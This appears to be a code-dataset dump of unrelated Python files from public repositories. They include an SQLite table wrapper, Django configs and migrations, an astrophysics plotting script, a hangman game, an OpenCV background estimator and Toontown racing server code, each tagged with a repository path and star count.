First column is always the primary key (never inserted)
"""
object.__init__(self)
self.__name = table_name
self.__conn = conn
self.__identity_column_name = columns[0][0]
self.__insert_column_names = []
# skip the unique column id
for c in columns[1:]:
self.__insert_column_names.append(c[0])
upgrade = False
c = conn.execute("SELECT name FROM sqlite_master WHERE type='table' AND name=?;", [table_name])
for row in c:
if row[0] == table_name:
upgrade = True
c.close()
if upgrade:
# TODO allow upgrade
pass
else:
col_sql = []
for c in columns:
s = '{0} {1}'.format(c[0], c[1])
if len(c) > 2 and c[2] is not None:
s += ' DEFAULT {0}'.format(c[2])
if len(c) > 3 and c[3] is not None:
s += ' {0}'.format(c[3])
col_sql.append(s)
sql = 'CREATE TABLE {0} ({1})'.format(table_name, ','.join(col_sql))
conn.execute(sql)
conn.commit()
def insert(self, *values):
vs = []
for n in values:
vs.append('?')
c = self.__conn.execute("INSERT INTO {0} ({1}) VALUES ({2})".format(
self.__name, ','.join(self.__insert_column_names), ','.join(vs)
), values)
r = c.lastrowid
c.close()
self.__conn.commit()
return r
def delete_by_id(self, id):
try:
c = self.__conn.execute("DELETE FROM {0} WHERE {1} = ?".format(
self.__name, self.__identity_column_name
), [id])
ret = c.rowcount
c.close()
self.__conn.commit()
return ret > 0
except:
print("PROBLEM with sql: {0}".format(
"DELETE FROM {0} WHERE {1} = ?".format(
self.__name, self.__identity_column_name)
))
raise
def delete_where(self, where_clause, *values):
c = self.__conn.execute('DELETE FROM {0} WHERE {1}'.format(
self.__name, where_clause), values)
ret = c.rowcount
c.close()
self.__conn.commit()
return ret
def close(self):
self.__conn = None
def __del__(self):
self.close()
class TableDef(object):
def __init__(self, name, columns=None):
object.__init__(self)
self.__name = name
self.__columns = []
if columns is not None:
self.__columns.extend(columns)
def with_column(self, name, type, default=None, index=None):
self.__columns.append([name, type, default, index])
return self
@property
def name(self):
return self.__name
@property
def columns(self):
return self.__columns
class Db(object):
def __init__(self, filename, table_defs):
"""
table_defs: list of TableDef instances.
"""
object.__init__(self)
self.__conn = sqlite3.connect(filename)
self.__tables = {}
for td in table_defs:
assert isinstance(td, TableDef)
t = Table(self.__conn, td.name, td.columns)
self.__tables[td.name] = t
def __del__(self):
self.close()
def close(self):
if self.__conn is not None:
self.__conn.close()
self.__conn = None
def query(self, query, *values):
"""
Returns iterable rows.
"""
# print("DEUBG query: {0} {1}".format(repr(query), repr(values)))
v2 = []
for v in values:
if isinstance(v, str) and '\\' in v:
v = v.replace('\\', '\\\\')
v2.append(v)
c = self.__conn.execute(query, values)
for r in c:
yield r
c.close()
def table(self, name):
return self.__tables[name]
4,232
Dator/dator/wsgi.py
treyfortmuller/barc
191
2024451
"""
WSGI config for ruenoor project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/howto/deployment/wsgi/
"""
import os
import sys
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "dator.settings")
path = '/home/ubuntu/dator'
if path not in sys.path:
sys.path.append(path)
sys.path.append('/home/ubuntu/dator/dator')
sys.path.append('/home/ubuntu/dist/lib/python2.7/site-packages')
application = get_wsgi_application()
588
plot/plot_spiralwidth.py
dh4gan/tache
5
2024080
# Written 15/1/18 by dh4gan
# Script reads spiralmembers.dat file from spiralfind
# Also reads best fit parameters for each arm
# Then computes distance of particle from arm as a function of radius
import filefinder as ff
import io_tache
import io_spiral
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.colors import LogNorm
npoints = 5000
print 'Select membership file to analyse:'
memberfile = ff.find_local_input_files('*_spiralmembers.dat')
ispiral = input("Which spiral to plot? ")
# Determine eigenvalue file name from memberfile name
eigenfile = memberfile[:-18]
# Read spiralmembers file
print 'Reading spiral membership in file',memberfile
x,y,z,spiralmember = io_spiral.read_spiralmembership(memberfile)
print 'Read ', len(spiralmember), ' elements'
#print spiralmember
# Read best fits (either .chimin or .fitparams)
fitparamfile = eigenfile+'_spirals.chimin'
fitdata = np.genfromtxt(fitparamfile,skiprows=2)
# Find fit parameters for selected arm
a = fitdata[ispiral-1,2]
b = fitdata[ispiral-1,3]
x0 = fitdata[ispiral-1,4]
y0 = fitdata[ispiral-1,5]
xsign = fitdata[ispiral-1,7]
ysign = fitdata[ispiral-1,8]
# Find all elements belonging to that arm
imember = spiralmember[:]==ispiral
x = x[imember]
y = y[imember]
z = z[imember]
xorigin = 0.0
yorigin = 0.0
nmember = len(x)
print 'Found ', nmember, ' members of spiral ', ispiral
# For each element:
# compute r, sepmin (minimum distance from spiral)
# save to arrays
#nmember = 1000
r = np.zeros(nmember)
t = np.zeros(nmember)
sepmin = np.zeros(nmember)
weight = np.zeros(nmember)
for i in range(nmember):
r[i] = io_spiral.separation(xorigin,yorigin,x[i],y[i])
t[i], sepmin[i] = io_spiral.find_minimum_t_logspiral(x[i],y[i],a,b,x0,y0,npoints,xsign=xsign,ysign=ysign)
print i,r[i],t[i], sepmin[i]
tmin = np.amin(t)
tmax = np.amax(t)
weight[:] = 1.0/float(nmember)
print 'Minimum, maximum r: ', np.amin(r), np.amax(r)
print 'Minimum, maximum t: ', tmin, tmax
print 'Generating curve: '
print a,b,x0,y0,xsign,ysign
xspiral, yspiral = io_spiral.generate_logspiral_curve(tmin,tmax,a,b,x0,y0,xsign=xsign,ysign=ysign,npoints=npoints)
fig1 = plt.figure()
ax1 = fig1.add_subplot(111)
#ax2 = fig1.add_subplot(212)
ax1.set_xlabel('R (kpc)',fontsize=22)
ax1.set_ylabel('Spine Distance (kpc)',fontsize=22)
counts, xbins,ybins, image = ax1.hist2d(r/10.0,sepmin/10.0,bins=20, range=[[1.0,4.0],[0.0,0.1]],normed=False,cmap='rainbow')
#plt.colorbar(image,ax=ax1)
maxcount = counts.max()
print maxcount, np.median(counts)
clevels = [50,70,90,95]
clabels = [str(i)+'%' for i in clevels]
clevels = [np.percentile(counts[np.nonzero(counts)],i) for i in clevels]
print clevels
print clabels
CS= ax1.contour(counts.transpose(),extent=[xbins.min(),xbins.max(),ybins.min(),ybins.max()],colors='white',levels=clevels)
fmt={}
for l,s in zip(CS.levels,clabels):
fmt[l]=s
plt.clabel(CS,fontsize=16,fmt=fmt)
#ax1.hist(sepmin[:100])
#ax2.scatter(x[:100],y[:100])
#ax2.plot(xspiral,yspiral,color='red')
fig2 = plt.figure()
ax2 = fig2.add_subplot(111)
ax2.set_ylabel('Relative Frequency',fontsize=22)
ax2.set_xlabel('Spine Distance (kpc)',fontsize=22)
ax2.hist(sepmin/10.0,bins=50, histtype='step', label='all radii', linewidth=2,normed=True)
sepclose = sepmin[np.logical_and(r[:]>=10.0,r[:]<20.0)]
sepfar = sepmin[np.logical_and(r[:]>=20.0,r[:]<30.0)]
ax2.hist(sepclose/10.0, histtype = 'step',label = '$1.0 < r < 2.0 $ kpc',linewidth=2,normed=True)
ax2.hist(sepfar/10.0,histtype = 'step',label = '$2.0 < r < 3.0 $ kpc',linewidth=2,normed=True)
ax2.legend(loc='upper right')
plt.show()
fig1.savefig(eigenfile+'spiral_'+str(ispiral)+'width_vs_r.png')
fig2.savefig(eigenfile+'spiral_'+str(ispiral)+'width1D.png')
3,721
src/exceptionite/tabs/RecommendationsTab.py
girardinsamuel/exceptionite
6
2024367
from ..Tab import Tab
from ..blocks.PackagesUpdates import PackagesUpdates
class RecommendationsTab(Tab):
name = "Recommendations"
id = "recommendations"
icon = "CheckCircleIcon"
advertise_content = True
def __init__(self, handler):
super().__init__(handler)
self.add_blocks(PackagesUpdates)
332
main.py
prehensile/knobtwiddler
0
2022831
import sys, os
import tuning
import rtlfm
# main runloop
rtl = rtlfm.RTLFM()
#while True:
for i in range( 10 ):
# get a tuning
t = tuning.get_next_tuning()
# sample a bit
rtl.sample_frequency(
frequency = t.frequency,
modulation = t.modulation,
duration = 5 * 1000
)
# TODO: detect non-silence
# if not silence
# TODO: sample more
# TODO: detect voice
426
kino/management/__init__.py
DongjunLee/kino-bot
109
2023160
import inspect
import json
from ..functions import Functions
from ..utils.data_handler import DataHandler
from ..utils.data_loader import SkillData
from ..utils.data_loader import FeedData
def register_skills():
skills = inspect.getmembers(Functions, predicate=inspect.isfunction)
del skills[0] # del __init__
print("start register skills")
skill_dict = {}
try:
for k, v in skills:
parsed_doc = parse_doc(v.__doc__)
if parsed_doc is None:
print(f"{k} skill do not have doc. skip thie skill.")
continue
parsed_doc["params"] = list(v.__annotations__.keys())
skill_dict[k] = parsed_doc
except BaseException as e:
print(v.__doc__)
data_handler = DataHandler()
data_handler.write_file("skills.json", skill_dict)
print(f"kino-bot has **{len(skill_dict)}** skills.")
for k, v in skill_dict.items():
print(
f" - {v.get('icon', ':white_small_square: ')}**{k}** : {v.get('description', '')}"
)
def parse_doc(doc_string):
if doc_string is None:
return None
parsed_doc = {}
for line in doc_string.splitlines():
if ":" in line:
line = line.strip()
delimeter_index = line.index(":")
key = line[:delimeter_index]
value = json.loads(line[delimeter_index + 1 :])
parsed_doc[key] = value
return parsed_doc
def prepare_skill_data():
print("setting skill logs for Skill Predictor ...")
SkillData()
def prepare_feed_data():
print("setting feed and pocket logs for Feed Classifier ...")
FeedData()
1,666
src/CommunityGAN/sampling.py
Bipasha-banerjee/newCGAN
69
2024094
import numpy as np
import multiprocessing
import sys
import pickle
import utils
import random
def choice(samples, weight):
s = np.sum(weight)
target = random.random() * s
for si, wi in zip(samples, weight):
if target < wi:
return si
target -= wi
return si
class Sampling(object):
def __init__(self):
super(Sampling, self).__init__()
self.config = pickle.load(open(sys.argv[1], 'rb'))
self.id2nid = pickle.load(open(self.config.cache_filename_prefix + '.neighbor.pkl', 'rb'))
self.total_motifs = pickle.load(open(self.config.cache_filename_prefix + '.motifs.pkl', 'rb'))
self.theta_g = pickle.load(open(self.config.cache_filename_prefix + '.theta.pkl', 'rb'))
self.args = pickle.load(open(self.config.cache_filename_prefix + '.args.pkl', 'rb'))
# print('load data done', datetime.datetime.now())
def run(self):
cores = self.config.num_threads
motifs, paths = zip(*multiprocessing.Pool(cores).map(self.g_s, self.args))
pickle.dump(motifs, open(self.config.cache_filename_prefix + '.motifs_sampled.pkl', 'wb'))
pickle.dump(paths, open(self.config.cache_filename_prefix + '.paths.pkl', 'wb'))
def g_s(self, args): # for multiprocessing, pass multiple args in one tuple
root, n_sample, only_neg = args
motifs = []
paths = []
for i in range(2 * n_sample):
if len(motifs) >= n_sample:
break
motif = [root]
path = [root]
for j in range(1, self.config.motif_size):
v, p = self.g_v(motif)
if v is None:
break
motif.append(v)
path.extend(p)
if len(set(motif)) < self.config.motif_size:
continue
motif = tuple(sorted(motif))
if only_neg and motif in self.total_motifs:
continue
motifs.append(motif)
paths.append(path)
return motifs, paths
def g_v(self, roots):
g_v_v = self.theta_g[roots[0]].copy()
for nid in roots[1:]:
g_v_v *= self.theta_g[nid]
current_node = roots[-1]
previous_nodes = set()
path = []
is_root = True
while True:
if is_root:
node_neighbor = list({neighbor for root in roots for neighbor in self.id2nid[root]})
else:
node_neighbor = self.id2nid[current_node]
if len(node_neighbor) == 0: # the root node has no neighbor
return None, None
if is_root:
tmp_g = g_v_v
else:
tmp_g = g_v_v * self.theta_g[current_node]
relevance_probability = np.sum(self.theta_g[node_neighbor] * tmp_g, axis=1)
relevance_probability = utils.agm(relevance_probability)
next_node = choice(node_neighbor, relevance_probability) # select next node
if next_node in previous_nodes: # terminating condition
break
previous_nodes.add(current_node)
current_node = next_node
path.append(current_node)
is_root = False
return current_node, path
if __name__ == '__main__':
if len(sys.argv) != 2:
print('Usage: python sampling.py config.pkl')
s = Sampling()
s.run()
3,424
tadataka/dataset/__init__.py
IshitaTakeshi/Tadataka
54
2024311
from tadataka.dataset.tum_rgbd import TumRgbdDataset
from tadataka.dataset.new_tsukuba import NewTsukubaDataset
from tadataka.dataset.euroc import EurocDataset
160
GRE Hangman/gameplay.py
ntdai95/Personal-Projects
3
2024111
# Importing the colored function for user-friendly display
from termcolor import colored
class LetterPlacer:
def placing_letter_in_word(self, chosen_letter, list_secret_word, list_current_position):
"""Placing the user's guessed letter into the corresponding position among the list of list_current_position and then convert
it to a string to print out to the user the location of his/her choice of guessed letters"""
# Creating an empty list for the indexes where the user's guessed letter is located
indexes = []
# Adding the indexes to the list of indexes where the user's guessed letter is located
for index, letter in enumerate(list_secret_word):
if letter == chosen_letter:
indexes.append(index)
# Change the "_" characters with the user's guessed letter based on its location in the secret word
for index in indexes:
list_current_position[index] = chosen_letter
# Creating an empty string to display the location of the guessed letter for the user
string_current_position = ""
# Adding up the "_" characters with the correctly guessed letters as a string to display to the user
for index in list_current_position:
string_current_position = string_current_position + " " + index
# Print out the location of the guessed letter to the user
print(f"{chosen_letter} is in the word{string_current_position}.")
# Return the updated list of list_current_position with the added guessed letter
return list_current_position
class GuessedWordChecker:
def guess_word_input_validator(self):
"""Asking and checking the user's guessed word"""
# Create a while loop to keep asking for a valid guessed word from the user
while True:
# Asking the user for the guessed word, allowing the mix of uppercased and lowercased letters. Need to be upeercased the
# user input, so that it can match with the uppercased secret word.
guessed_word = input("\nTry and guess the word? ").upper()
# If the user's guessed word is valid, then return it.
if guessed_word.isalpha() == True:
return guessed_word
# If the user's guessed word is not valid (the guessed word contains non-alphabetical characters such as numbers of symbols,
# @, !, etc.), then display the warning message and go back and ask the new guessed word again.
else:
print("Please, guess a real word with alphabetical letters only.")
def guessed_word_is_secret_word(self, guessed_word, secret_word, wrong_guess):
"""Decides if the user's guessed word is the same as the secret word"""
# If the user's guessed word is the same as the secret word, then return the user's guessed word, which will be the same as the
# secret word
if guessed_word == secret_word:
return guessed_word
# If the user's guessed word is not the same as the secret word, then print out the warning message and return the guessed word
# as an empty string
else:
guessed_word = ""
print(f"That is not the word.\nYou still have {wrong_guess} guesses remaining.")
return guessed_word
class LetterChecker:
def letter_validator(self, chosen_letter, guessed_letters):
"""Checking if the user's entered letter is valid or not"""
# Check if the user enters an alphabetical letter or not
if chosen_letter.isalpha() == False:
print("Please, enter an alphabetical letter only!")
# Check if the user enters only 1 letter or not
elif len(list(chosen_letter)) != 1:
print("Please, enter one letter only!")
# Check if the guessed letter has already been guessed before
elif chosen_letter in guessed_letters:
print("You already guessed this letter. Please, choose another letter.")
# If there is no issue with the guessed letter, then return the following message
else:
return "Good letter"
def chosen_letter_in_list_secret_word(self, chosen_letter, wrong_guess, list_secret_word, list_current_position, secret_word, guessed_word):
"""Checking if the user's chosen letter is among the list of letters of the secret word"""
# Checking if user input of letter is in the secret word
if chosen_letter in list_secret_word:
# If the chosen letter is in the list of letters of secret word, then place that guessed letter in to its appropriate
# position(s) in the list of letters of secret word with the function of
# placing_letter_in_word()
instance_of_LetterPlacer = LetterPlacer()
list_current_position = instance_of_LetterPlacer.placing_letter_in_word(chosen_letter, list_secret_word, list_current_position)
# If the user find out all of the letters in the secret word, then there is no point to keep asking him again to guess the
# secret word
if "_" not in list_current_position:
return wrong_guess, list_current_position, secret_word
else:
instance_of_GuessedWordChecker = GuessedWordChecker()
# Ask the user to enter his/her's guess for the secret word and check if it is valid
guessed_word = instance_of_GuessedWordChecker.guess_word_input_validator()
# Replacing the guessed word with the secret word if the user correctly guessed the word with the function of
# guessed_word_is_secret_word()
guessed_word = instance_of_GuessedWordChecker.guessed_word_is_secret_word(guessed_word, secret_word, wrong_guess)
# If the word is not in the secret word, then decrease the number of guesses remaining by 1 and print out how many guess remains
# for the user
else:
wrong_guess -=1
print(f"{chosen_letter} is not in the word.\nYou have {wrong_guess} guesses remaining.")
# Return the updated wrong_guess, list_current_position, guessed_word variables
return wrong_guess, list_current_position, guessed_word
class Gameplay:
def gameplay(self, secret_word, definition_secret_word, list_current_position, list_secret_word, wrong_guess, guessed_letters):
"""Deciding if the user correctly guessed the word or not"""
# Creating a while loop to let the user guessed the letters until he/she runs out of guesses remainng
while wrong_guess != 0:
# Displaying the definition and the current position of guessed letters in the secret word
print(colored(f"\nDefinition: {definition_secret_word}", "cyan"))
string_current_position = ""
for character in list_current_position:
string_current_position += character + " "
print(colored(f"Word: {string_current_position[:-1]}\n", "cyan"))
# Asking the user for a letter, allowing either an uppercased or lowercased letter. Need to be uppercased the user input so
# that it can match the list of uppercased letters from the list of list_secret_word
chosen_letter = input("Guess a letter? ").upper()
# Checking, if the letter is valid with the letter_validator() function
instance_of_LetterChecker = LetterChecker()
letter_validity = instance_of_LetterChecker.letter_validator(chosen_letter, guessed_letters)
# Creating an empty string of guessed word, which will be the secret word if the user guesses it correctly and empty string
# otherwise
guessed_word = ""
# If the user input letter is valid, then move on, otherwise go back and ask a new letter again
if letter_validity == "Good letter":
# Adding the user entered valid letter to the lsit of guessed_letters to later check if the user is guessing the same
# letter again
guessed_letters.append(chosen_letter)
# Checking if the user's guessed letter is among the list of letters of the secret word with the function of
# chosen_letter_in_list_secret_word(). Then, return the number of wrong guesses remaining, the
# list of list_current_position (to display the current standing to the user), and the guessed_word as a secret word if
# the user guesses the word correctly after the guessing correctly the letter is among the letters of the secret word
wrong_guess, list_current_position, guessed_word = instance_of_LetterChecker.chosen_letter_in_list_secret_word(chosen_letter, wrong_guess, list_secret_word, list_current_position, secret_word, guessed_word)
# If the user guessed the secret word correctly, then return the guessed word as a secret word
if guessed_word == secret_word:
return guessed_word
# If the user did not guessed the secret word correctly and runs out of guesses, then return the guessed word as an empty string
else:
return guessed_word
9,282
tests/test_perl_side_proxy.py
yacchi21/PyPerl5
0
2024379
# -*- coding:utf8 -*-
from __future__ import division, print_function, unicode_literals
import unittest
import perl5
class ProxyTestObject(object):
def __init__(self, attr1):
self._attr1 = attr1
def attr1(self, data=None):
if data is None:
return self._attr1
self._attr1 = data
def proxy_test_func(arg):
return arg
SCRIPT = r"""
use PyPerl5::Proxy qw/ py_get_object /;
use PyPerl5::Boolean qw/ true false /;
sub unit_test {
my $ut = shift;
$ut->assertTrue(1);
$ut->assertFalse(0);
$ut->assertTrue(true);
$ut->assertFalse(false);
$ut->assertEqual([1, true], [1, true]);
}
sub unit_test2 {
my $ut = shift;
my $class = py_get_object("tests.test_perl_side_proxy.ProxyTestObject");
$ut->assertTrue($class->isa("PyPerl5::Proxy"));
my $o = $class->new("TEST");
$ut->assertEqual("TEST", $o->attr1);
$o->attr1("TEST2");
$ut->assertEqual("TEST2", $o->attr1);
}
sub unit_test3 {
my $ut = shift;
my $f = py_get_object("tests.test_perl_side_proxy.proxy_test_func");
my $ret = $f->("call");
$ut->assertEqual("call", $ret);
}
"""
class TestCase(unittest.TestCase):
vm = None
def setUp(self):
self.vm = vm = perl5.VM()
vm.eval(SCRIPT)
def tearDown(self):
self.vm.close()
def test_object_proxy(self):
self.vm.call("unit_test", self)
def test_py_get_object(self):
self.vm.call("unit_test2", self)
def test_function_exec(self):
self.vm.call("unit_test3", self)
if __name__ == '__main__':
unittest.main()
1,618
src/utils/__init__.py
amiiiirrrr/TensorRT_keras_model
1
2024204
#coding: utf-8
from utils.callbacks import CallbackForSegmentation
from utils.imagegen import CroppedImageDataGenerator, get_datagen
from utils.misc import *
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('beekeepers', '0004_survey_unique_together'),
]
operations = [
migrations.CreateModel(
name='AprilSurvey',
fields=[
('survey', models.OneToOneField(related_name='april', primary_key=True, serialize=False, to='beekeepers.Survey')),
('colony_loss_reason', models.TextField(help_text='The most likely causes for colony loss')),
],
),
]
608
dash_berkay/urls.py
efebuyuk/jd_intern_project
1
2024588
from django.urls import path
from . import views
from django.conf.urls import url
urlpatterns = [
path('', views.startapp),
]
131
transaction/tests/models/test_user_tag.py
Arthuchaut/sagittarius_project
0
2024067
import pytest
from user.models import User
from transaction.models import UserTag
class TestUserTag:
'''The UserTag model test class.
'''
@pytest.mark.django_db(transaction=True)
@pytest.mark.parametrize(
'name, icon', [
('foo', None),
('bar', 'baz'),
pytest.param(None, 'baz', marks=pytest.mark.xfail),
]
)
def test_create(self, lambda_user: User, name: str, icon: str) -> None:
'''Test the user_tag creation.
'''
user_tag: UserTag = UserTag.objects.create(
name=name, icon=icon, user=lambda_user
)
assert user_tag
647
niaaml/fitness/utility.py
musicinmybrain/NiaAML
22
2024406
from niaaml.utilities import Factory
from niaaml.fitness.accuracy import Accuracy
from niaaml.fitness.cohen_kappa import CohenKappa
from niaaml.fitness.precision import Precision
from niaaml.fitness.f1 import F1
__all__ = ["FitnessFactory"]
class FitnessFactory(Factory):
r"""Class with string mappings to fitness class.
Attributes:
_entities (Dict[str, Fitness]): Mapping from strings to fitness classes.
See Also:
* :class:`niaaml.utilities.Factory`
"""
def _set_parameters(self, **kwargs):
r"""Set the parameters/arguments of the factory."""
self._entities = {
"Accuracy": Accuracy,
"Precision": Precision,
"CohenKappa": CohenKappa,
"F1": F1,
}
762
backend/posts/migrations/0002_remove_post_tags.py
a-samir97/medium-clone
0
2024202
# Generated by Django 3.1.3 on 2020-11-21 09:49
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('posts', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='post',
name='tags',
),
]
311
tools/modules/TREX/core/__init__.py
automenta/trex-autonomy
0
2024063
# Import TREX analog classes
from TREX.core.db_core import DbCore,Timeline
from TREX.core.assembly import Assembly,Entity,Rule,Token,Slot,Variable
# Import
from TREX.core.token_network import TokenNetwork
from TREX.core.token_network_filter import TokenNetworkFilter
import itertools
import numpy
import six
from chainer import testing
import chainer.utils
def pooling_patches(dims, ksize, stride, pad, cover_all):
"""Return tuples of slices that indicate pooling patches."""
# Left-top indexes of each pooling patch.
if cover_all:
xss = itertools.product(
*[six.moves.range(-p, d + p - k + s, s)
for (d, k, s, p) in six.moves.zip(dims, ksize, stride, pad)])
else:
xss = itertools.product(
*[six.moves.range(-p, d + p - k + 1, s)
for (d, k, s, p) in six.moves.zip(dims, ksize, stride, pad)])
# Tuples of slices for pooling patches.
return [tuple(slice(max(x, 0), min(x + k, d))
for (x, d, k) in six.moves.zip(xs, dims, ksize))
for xs in xss]
def shuffled_linspace(shape, dtype):
size = chainer.utils.size_of_shape(shape)
x = numpy.random.permutation(size) + numpy.random.uniform(0.3, 0.7, size)
x = (2 * x / max(1, size) - 1).astype(dtype)
return x.reshape(shape)
testing.run_module(__name__, __file__)
1,082
tensortools/optimize/__init__.py
klmcguir/tensortools
0
2023168
"""
Optimization routines for CP decompositions
"""
from .optim_utils import FitResult
from .cp_als import cp_als
from .mcp_als import mcp_als
from .ncp_hals import ncp_hals
from .ncp_bcd import ncp_bcd
from .mncp_hals import mncp_hals
237
Python/BGEstimation.py
Prasheel24/background-estimation
0
2022696
# -*- coding: utf-8 -*-
"""Background Estimation with Median Filtering"""
__name__ = "BGEstimation"
__version__ = (1,0)
__author__ = "<NAME> <<EMAIL>>"
_generator_name = __name__ + "-" + ".".join(map(str, __version__))
# Import the required libraries
import numpy as np
import sys, os
try:
sys.path.remove('/opt/ros/kinetic/lib/python2.7/dist-packages')
except:
pass
import cv2
from skimage import data, filters
# Capture the Video for Background Estimation in VideoCapture object
captured_video = cv2.VideoCapture('MorganBridgeFeed.mp4')
# Select 25 frames from the captured_video at Random
# CAP_PROP_FRAME_COUNT returns the frame count from the video file
# Product with np.random.uniform with specified size gives
# Random frames from the video of type ndarray
frame_ids = captured_video.get(cv2.CAP_PROP_FRAME_COUNT) * np.random.uniform(size=20)
# Store the frames in an empty array(list)
temp_frames = []
# Loop through to get each frame with its corresponding id
for frame_id in frame_ids:
# mark each frame on videocapture object
captured_video.set(cv2.CAP_PROP_POS_FRAMES, frame_id)
# get each frame
ret_val, individual_frame = captured_video.read()
# append into temporary list
temp_frames.append(individual_frame)
# print(ret_val)
# Now we calculate the median along the time axis
median_frame = np.median(temp_frames, axis=0).astype(dtype=np.uint8)
# Display the median frame thus calculated
cv2.imshow('Median Frame', median_frame)
cv2.waitKey(0)
# cv2.imwrite('median_frame.jpg',median_frame)
# Now we create a mask for every frame
# Reset previously set frame number to 0
captured_video.set(cv2.CAP_PROP_POS_FRAMES, 0)
# Now convert median frame to grayscale
gray_median_frame = cv2.cvtColor(median_frame, cv2.COLOR_BGR2GRAY)
cv2.imshow('Gray Scale Image', gray_median_frame)
cv2.waitKey(0)
while(ret_val):
# Read the current frame
ret, frame = captured_video.read()
if frame is not None:
# Convert the current frame to grayscale
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
# Calculate absolute difference of current frame and the median frame
diff_frame = cv2.absdiff(frame, gray_median_frame)
# Threshold to binarize
th, diff_frame = cv2.threshold(diff_frame, 30, 255, cv2.THRESH_BINARY)
# Display the final image
# cv2.imshow('Temp Frames',frame)
cv2.imshow('Difference Frames', diff_frame)
cv2.waitKey(20)
cv2.waitKey(0)
# Release VideoCapture object
captured_video.release()
# Close all Windows
cv2.destroyAllWindows()
2,503
scripts/create_test_data_file_from_bt.py
roger-/pyzephyr
1
2022800
import serial
import time
import platform
import csv
import zephyr.protocol
def main():
serial_port_dict = {"Darwin": "/dev/cu.BHBHT001931-iSerialPort1",
"Windows": 23}
serial_port = serial_port_dict[platform.system()]
ser = serial.Serial(serial_port)
callback = lambda x: None
protocol = zephyr.protocol.BioHarnessProtocol(ser, callback, "../test_data/120-second-bt-stream")
protocol.enable_periodic_packets()
start_time = time.time()
while time.time() < start_time + 120:
protocol.read_and_handle_bytes(1)
if __name__ == "__main__":
main()
630
toontown/hood/GSHoodAI.py
journeyfan/toontown-journey
1
2024433
from toontown.classicchars import DistributedGoofySpeedwayAI
from libpandadna import DNAGroup, DNAVisGroup
from toontown.hood import HoodAI
from toontown.hood import ZoneUtil
from toontown.racing import RaceGlobals
from toontown.racing.DistributedRacePadAI import DistributedRacePadAI
from toontown.racing.DistributedStartingBlockAI import DistributedStartingBlockAI
from toontown.racing.DistributedViewPadAI import DistributedViewPadAI
from toontown.racing.DistributedStartingBlockAI import DistributedViewingBlockAI
from toontown.toonbase import ToontownGlobals
class GSHoodAI(HoodAI.HoodAI):
def __init__(self, air):
HoodAI.HoodAI.__init__(self, air,
ToontownGlobals.GoofySpeedway,
ToontownGlobals.GoofySpeedway)
self.racingPads = []
self.viewingPads = []
self.viewingBlocks = []
self.startingBlocks = []
self.leaderBoards = []
self.classicChar = None
self.startup()
def startup(self):
HoodAI.HoodAI.startup(self)
self.createStartingBlocks()
self.createLeaderBoards()
self.cycleLeaderBoards()
if simbase.config.GetBool('want-goofy', True):
self.createClassicChar()
def shutdown(self):
HoodAI.HoodAI.shutdown(self)
taskMgr.removeTasksMatching('leaderBoardSwitch')
for board in self.leaderBoards:
board.delete()
del self.leaderBoards
def findRacingPads(self, dnaGroup, zoneId, area, padType='racing_pad'):
racingPads = []
racingPadGroups = []
if isinstance(dnaGroup, DNAGroup) and (padType in dnaGroup.getName()):
racingPadGroups.append(dnaGroup)
if padType == 'racing_pad':
nameInfo = dnaGroup.getName().split('_')
racingPad = DistributedRacePadAI(simbase.air)
racingPad.setArea(zoneId)
racingPad.nameType = nameInfo[3]
racingPad.index = int(nameInfo[2])
nextRaceInfo = RaceGlobals.getNextRaceInfo(-1, racingPad.nameType, racingPad.index)
racingPad.setTrackInfo([nextRaceInfo[0], nextRaceInfo[1]])
racingPad.generateWithRequired(zoneId)
elif padType == 'viewing_pad':
racingPad = DistributedViewPadAI(simbase.air)
racingPad.setArea(zoneId)
racingPad.generateWithRequired(zoneId)
else:
self.notify.error('Invalid racing pad type: ' + padType)
racingPads.append(racingPad)
elif isinstance(dnaGroup, DNAVisGroup):
zoneId = ZoneUtil.getTrueZoneId(int(dnaGroup.getName().split(':')[0]), zoneId)
for i in range(dnaGroup.getNumChildren()):
(foundRacingPads, foundRacingPadGroups) = self.findRacingPads(dnaGroup.at(i), zoneId, area, padType=padType)
racingPads.extend(foundRacingPads)
racingPadGroups.extend(foundRacingPadGroups)
return (racingPads, racingPadGroups)
def findStartingBlocks(self, dnaGroup, racePad):
startingBlocks = []
if isinstance(dnaGroup, DNAGroup) and ('starting_block' in dnaGroup.getName()):
x, y, z = dnaGroup.getPos()
h, p, r = dnaGroup.getHpr()
if isinstance(racePad, DistributedRacePadAI):
startingBlock = DistributedStartingBlockAI(simbase.air)
elif isinstance(racePad, DistributedViewPadAI):
startingBlock = DistributedViewingBlockAI(simbase.air)
else:
self.notify.error('Unknown starting block type.')
startingBlock.setPosHpr(x, y, z, h, p, r)
startingBlock.setPadDoId(racePad.doId)
startingBlock.setPadLocationId(getattr(racePad, 'index', 0))
startingBlock.generateWithRequired(racePad.zoneId)
startingBlocks.append(startingBlock)
for i in range(dnaGroup.getNumChildren()):
foundStartingBlocks = self.findStartingBlocks(dnaGroup.at(i), racePad)
startingBlocks.extend(foundStartingBlocks)
return startingBlocks
def createStartingBlocks(self):
self.racingPads = []
self.viewingPads = []
racingPadGroups = []
viewingPadGroups = []
for zoneId in self.getZoneTable():
dnaData = self.air.dnaDataMap.get(zoneId, None)
zoneId = ZoneUtil.getTrueZoneId(zoneId, self.zoneId)
if dnaData.getName() == 'root':
area = ZoneUtil.getCanonicalZoneId(zoneId)
(foundRacingPads, foundRacingPadGroups) = self.findRacingPads(dnaData, zoneId, area, padType='racing_pad')
(foundViewingPads, foundViewingPadGroups) = self.findRacingPads(dnaData, zoneId, area, padType='viewing_pad')
self.racingPads.extend(foundRacingPads)
racingPadGroups.extend(foundRacingPadGroups)
self.viewingPads.extend(foundViewingPads)
viewingPadGroups.extend(foundViewingPadGroups)
self.startingBlocks = []
for (dnaGroup, racePad) in zip(racingPadGroups, self.racingPads):
foundStartingBlocks = self.findStartingBlocks(dnaGroup, racePad)
self.startingBlocks.extend(foundStartingBlocks)
for startingBlock in foundStartingBlocks:
racePad.addStartingBlock(startingBlock)
self.viewingBlocks = []
